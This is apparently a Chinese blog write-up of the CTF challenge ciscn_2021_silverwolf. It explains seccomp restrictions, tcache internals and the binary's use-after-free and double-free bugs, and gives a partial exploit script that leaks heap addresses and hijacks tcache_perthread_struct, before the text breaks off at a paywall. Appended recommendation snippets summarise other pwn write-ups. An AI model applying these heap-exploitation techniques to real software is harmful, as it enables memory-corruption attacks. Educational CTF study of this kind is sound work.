沙盒禁用+tcache

最新推荐文章于 2022-07-01 16:34:33 发布
原创 最新推荐文章于 2022-07-01 16:34:33 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #pwn

本文详细解析了2021年全国大学生信息安全竞赛CISCN银狼题目的解题过程,包括利用沙盒保护漏洞进行堆溢出攻击、泄露libc基址,并最终获取flag。

题目

2021全国大学生信息安全竞赛-ciscn_2021_silverwolf

保护

$ checksec silverwolf
[*] '/home/hnhuangjingyu/sliverwolf_my/silverwolf'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

保护全开,值得注意的是我们这里查看下ldd信息

$ ldd silverwolf_init
	linux-vdso.so.1 (0x00007ffff7fcd000)
	libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007ffff7d89000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7b97000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcf000)

可以看到这里使用了libseccomp.so,所以应该是个沙盒禁用题,我用seccomp-tools工具查看如下

$ seccomp-tools dump ./silverwolf
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
 0005: 0x15 0x02 0x00 0x00000000  if (A == read) goto 0008
 0006: 0x15 0x01 0x00 0x00000001  if (A == write) goto 0008
 0007: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x06 0x00 0x00 0x00000000  return KILL

这里可以发现确实开启了沙盒保护,且open不能使用,好像openat也不能使用,之前做过一个类似的题目ciscn_final_4(解题思路差不多,开启了反调试)感兴趣的可以去试试

分析

main

在这里插入图片描述

alloc

在这里插入图片描述

这里知道malloc最大值为0x78,且程序只会存储一个堆块指针

edit
在这里插入图片描述

这里offbynull漏洞,从这里看出来,edit并没见检查堆指针,所以即使进入到了bin中也能直接修改数据,那么就可以很方便的进行修改fd了

show

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i8E9wRK8-1653415114670)(沙盒禁用+tcache.assets/image-20220525011149124.png)]

dele

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NzZMUkLm-1653415114670)(沙盒禁用+tcache.assets/image-20220525011309613.png)]

有uaf漏洞、doublefree

思路

这里的程序很简单漏洞百出,就是个baby题目,但是因为有了沙盒保护所以有了一丢丢难度(我也是过几天准备国赛这里才来刷往年的题目的>.<)ok话不多说开始!

因为doublefree+uaf所以我们可以很方便的进行泄漏libc

这里给大家说明下tcache的特性,这里的glibc的版本是2.27,那么在tcache初始化的时候会有一个tcache_perthread_struct的堆结构也就是那个位于堆结构第一个的堆块,在glibc2.27中它的大小为0x250,为什么是0x250呢,来看看源码定义:

typedef struct tcache_perthread_struct
{
   
   
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

可以看到它由两部分组成,counts用于记录每个释放tcache堆块的大小,entries用于记录释放堆块的指针也就是链表,而在64bit中TCACHE_MAX_BINS默认大小为64,那么计算得出char counts[64] = 0x40 , tcache_entry *entries[64] = 0x200,从而得出0x10 + 0x40 + 0x200 = 0x250大小,不难发现每个tcache的counts变量它的容量是char那么就是最大值为0xff

有了上面的知识那么我们使用tcache泄漏libc也就不难了

(0x20)   tcache_entry[0](7): 0x555555606610 --> 0x555555606790 --> 0x5555556065f0 --> 0x5555556068a0 --> 0x5555556060b0 --> 0x555555606450 --> 0x555555606020
(0x40)   tcache_entry[2](2): 0x555555606920 --> 0x555555606920 (overlap chunk with 0x555555606910(freed) )
(0x60)   tcache_entry[4](1): 0x5555556068c0
(0x70)   tcache_entry[5](7): 0x555555606360 --> 0x5555556060d0 --> 0x5555556062f0 --> 0x555555606490 --> 0x555555606630 --> 0x5555556067b0 --> 0x555555606040
(0x80)   tcache_entry[6](7): 0x555555605e90 --> 0x5555556061b0 --> 0x555555606250 --> 0x5555556063d0 --> 0x555555606570 --> 0x555555606820 --> 0x555555605fa0
(0xd0)   tcache_entry[11](3): 0x555555605ad0 --> 0x5555556057a0 --> 0x555555605310
(0xf0)   tcache_entry[13](2): 0x5555556066a0 --> 0x555555605cd0


gef➤  addr 0x555555605000  //查看tcache_perthread_struct内存数据
0x555555605000:	0x0000000000000000	0x0000000000000251
0x555555605010:	0x0007070100020007	0x0000020003000000 //可以发现数据都是和上面对应的
0x555555605020:	0x0000000000000000	0x0000000000000000
0x555555605030:	0x0000000000000000	0x0000000000000000  //那么我们将0x555555605030这里改为0xff000000,则表示0x250的tcache已经装满的0xff个,那么再次free则会进入unsortbin中
0x555555605040:	0x0000000000000000	0x0000000000000000
0x555555605050:	0x0000555555606610	0x0000000000000000
0x555555605060:	0x0000555555606920	0x0000000000000000
0x555555605070:	0x00005555556068c0	0x0000555555606360
0x555555605080:	0x0000555555605e90	0x0000000000000000

那么exp为:

alloc(0x30)
dele()  #free
edit('A'*0x8)
dele() #double free
show()
ru('Content: ')
heap = info(rc(6),"heap") - 0x1920  #得到堆地址

alloc(0x30)
edit(p64(heap + 0x10)) #修改fd为tcache的tcache_perthread_struct地址
alloc(0x30)
alloc(0x30)
edit(p64(0)*4 +p64(0xff000000)) #拿到tcache_perthread_struct
dele()
show()
ru('Content: '
最低0.47元/天 解锁文章
禁用+堆栈结合+反调试-ciscn_final_4
csdn546229768的博客
03-24 537
这题比较好玩题目采用了禁用+堆栈结合+反调试 保护 分析 main函数 watch函数 结合我的注释看,这题是有反调试的,所以就我们在本地打的时候可以将这文件的反调试部分就nop掉,之前会一点点逆向的题,所以也没耗多少时间,具体nop手法看我的另一篇文章[链接]:121312 nop后的main函数: new函数 mwrite函数 delete函数 总结: add函数可以malloc 32次 有打印堆数据函数 delete函数有uaf漏洞 运行程序后说不能执行系统调用(嗯~)之前没遇到过
[tcache double free + orw]MynoteMax
huzai9527的博客
07-11 347
[tcache double free + orw]MynoteMax 1. ida分析 漏洞点和Mynote一样,但是加了 禁用了execve,因此同样利用double free 和 uaf 进行 orw进行操作 2. 思路 本题需要从堆打到栈,需要利用一些通用的gadgets, 如setcontext + 53 将 free_hook 设置为 setcontext +53,再在相应的chunk中布置相应的sigframe free掉相应的chunk触发setcontext(srop),
python图灵测试_一道简单的CTFpython沙箱逃逸题目
weixin_39640417的博客
12-09 763
看了几天的ssti注入然后了解到有python沙箱逃逸学过ssti注入的话python沙箱逃逸还是很容易理解的。看一道CTF题目,源码的话我改了改,一开始不能用,直接在py2上运行就好。题目要求读取./key的值,我们这里来执行命令。def make_secure():UNSAFE = ['open','file','execfile','compile','reload','__import__...
[V&N2020 公开赛]simpleHeap-记录一次gef调试过程
qq_40712959的博客
10-24 1087
[V&N2020 公开赛]simpleHeap 安全机制: IDA反汇编 main: Add: Edit: 可以看到get_input_content函数包含一个off_by_one漏洞。 Show: Delete 可以看到free函数之后,将chunkptr置为0,所以不存在UAF 思路: 利用off-by-one漏洞,篡改chunk的size大小,使被篡改大小的chunk覆盖其后已申请的chunk大小,从而导致chunk overlapping
有关逃逸的两道题目
playmaker的博客
06-11 1192
有关逃逸的两道题目 1.BCTF-2017 Monkey 拿到题目给了一个js文件,是一个模拟终端的程序。输入os.system(’/bin/sh’),即可拿到shell. 2.CUIT-2017 这题就没上一题那么容易。 输入os.system(’/bin/sh’)函数被检测出,应该是启用了字符串过滤 ''和.都被过滤,但是system没有过滤,此时我们可以使用getattr 来进行g...
Microsoft365开发人员申请
ban_xch的博客
06-23 4931
microsoft365开发者申请
SWPUCTF_2019_p1KkHeap(tcache表头攻击,uaf,ORW)
m0_51251108的博客
11-18 643
SWPUCTF_2019_p1KkHeap: 保护全开 程序分析: 开了我们看一下,可以看到禁用了execve,我们只能用orw组合读取flag 在0x6666000的地方给了我们一块可读可写可执行的区域 还有一些小限制,只能实行0x12次循环 free只能3次 malloc最大0x100,不让我们直接申请0x410能free到unsortbin 漏洞分析: 显然有个uaf 大致思路: 1.先利用uaf,泄露堆地址 2.doublefree后申请三次,让tcache_bin中的index改到
2021 ciscn-pwn 初赛
csdn546229768的博客
06-05 811
2021全国大学生信息安全竞赛-pwny_init 分析 mainreadwrite这个程序其实就是两个核心函数,和名字一样,因为操作的fd指针是个随机参数文件,我们通过修改fd指针为0,也就是控制台就可以实现任意读写了,那么程序就简单了很简单我们看这个这里组的偏移是由我们决定的且没有大小限制(是int64类型的变量)。ok看看bss段qword_202060和随机函数的fd指针只相差0x100偏移,那么就可以间接的控制fd为0了,具体利用如下: 这里就可以将fd置为0,我也是gdb调试调试着就发现的,仔细
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 2055
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
Java pwn_2020网鼎杯部分WEB&&PWN题解
weixin_29956903的博客
02-26 1171
今年网鼎杯不说啥了,没打进前130,我是菜B比不过各位师傅本文包括四场网鼎的部分WEB和PWN,本着菜鸡应该多练习的原则四场都看了看,除第一场外均为复现。青龙组PWN-boom1[*] '/home/Railgun/Desktop/2020wdb/pwn1'Arch: amd64-64-littleRELRO: Full RELROStack: Canary foundNX: ...
0CTF 2018 BabyHeap
Bill
04-15 1187
0CTF 2018 Babyheap 前言 上周0CTF临危受命,就做出一道题, 感觉思路很新颖, 分享一下. 题目分析 1. checksec Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: ...
glibc内存管理机制及内存碎片
Amazing
09-08 3111
1. glibc(即C库)内存管理框架 2.内存碎片 2.1.开启glibc tcache后的内存碎片 C库在管理内存时,都是将其根据用户数据分配为相邻的块,在进行malloc时也是从满足用户数据大小的相邻块中抽出一块,然后返回给用户使用。在free时,它将会用当前free的块去寻找与其相邻的块,如果在已经free的序列中(fastbin、small bin、large bin...
pwn学习---保护机制
gclome的博客
03-20 2764
操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就不能直接执行栈上的数据,存在ASLR(PIE)的话各个系统调用的地址就是随机化的。 解读: Arch: i386-32-little ...
启用Windows
XerCis的博客
02-04 6367
是一个隔离的运行环境,可以运行一些安全性未知的软件,或有试用期的软件
ciscn 2022 华东北分区赛pwn bigduck
z1r0的博客
07-01 941
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
我要学pwn.day16
weixin_45963786的博客
07-30 3445
pwn2_sctf_2016 潜心修炼,从基础开始 这是一道整数溢出加ROP的题 解题流程 1.查看文件保护 checksec pwn2_sctf_2016 [*] '/home/ctf/Downloads/pwnexercise/bjdctf_2020_babyrop/pwn2_sctf_2016' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX
pwn(三)
小明的小书包Ya
10-04 2610
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
Pwn 学习 question_5_plus_x64 ret2csu
MrTreebook的博客
05-01 519
Pwn 学习 question_5_plus_x64 ret2csu1.源代码2.源代码分析3._libc_csu_init 分析4.ROP编程5.ropper看以下gadget6.exp[点击跳转 libc database search](https://libc.blukat.me/)7.看一下效果所有源代码和程序以及调试程序都放在了gitee 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h>
简单说说容器/(Sandbox)以及Linux seccomp
热门推荐
TCP/IP
07-20 1万+
如果应用程序逻辑有误,会造成操作系统崩溃… 这句话其实不对。如果一个应用程序都能让一个操作系统崩溃了,那这一定是这个系统在设计上或者实现上的BUG!再次重申,我不知道谭浩强的C语言教材现在是怎么讲的,但是至少在15年前,很多老师都会说访问空指针会造成操作系统崩溃,这在32位虚拟内存的系统中是错误的。 虽然一个应用程序不能让一个正常的现代操作系统崩溃,但是它却可以对操作系统的运行环境造成巨大...
linux QWebEngineView 禁用
最新发布
10-31
如果你需要禁用Linux下的QWebEngineView的功能,通常是因为某些特定需求,如调试、高级权限访问等,但请注意这可能会增加应用程序的风险。 要禁用QWebEngineView的,你需要明确地设置其相关的安全属性。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值